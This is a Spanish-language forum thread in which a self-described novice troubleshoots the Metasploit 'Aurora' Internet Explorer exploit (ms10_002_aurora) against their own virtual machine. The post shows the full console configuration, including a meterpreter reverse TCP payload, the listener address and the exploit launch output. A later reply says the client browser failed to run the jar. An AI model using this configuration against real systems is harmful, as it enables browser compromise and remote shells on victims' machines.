elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Bugs y Exploits / Re: Problema con exploit ms10_002_aurora en: 7 Agosto 2016, 19:44 pm
Buenas tardes,

me contesto a mi mismo, el tema era que el navegador del cliente no estaba ejecutando correctamente el jar.

Tema solucionado.
2  Seguridad Informática / Bugs y Exploits / Problema con exploit ms10_002_aurora en: 6 Agosto 2016, 17:28 pm
Buenas tardes a todos,

Tengo un problema al ejecutar el exploit indicado del asunto. Estoy haciendo pruebas en local con una máquina virtual, en mi linux el server queda esperando y en la vm ejecuto la url en el navegador.

Tengo abierto el puerto 8001.

Antes de ejecutar 192.168.0.102:8080 tengo la consola "started":


resource (/root/.set/meta_config)> use windows/browser/ms10_002_aurora
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp_dns
PAYLOAD => windows/meterpreter/reverse_tcp_dns
resource (/root/.set/meta_config)> set LHOST 192.168.0.102
LHOST => 192.168.0.102
resource (/root/.set/meta_config)> set LPORT 8001
LPORT => 8001
resource (/root/.set/meta_config)> set URIPATH /
URIPATH => /
resource (/root/.set/meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
  • Exploit running as background job.
  • Started reverse TCP handler on 192.168.0.102:8001
msf exploit(ms10_002_aurora) >


Después de ejecutar:


  • 192.168.0.102    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
  • 192.168.0.102    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption

Busco sesiones activas y nada:

msf exploit(ms10_002_aurora) > sessions -i

Active sessions
===============

No active sessions.



¿Alguien me puede ayudar? Os comento que en el tema de exploit soy un poco novato, estoy leyendo mucho y empapandome de todo, por eso lo de mis pruebas locales.

Gracias a todos!!

Saludos.

Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines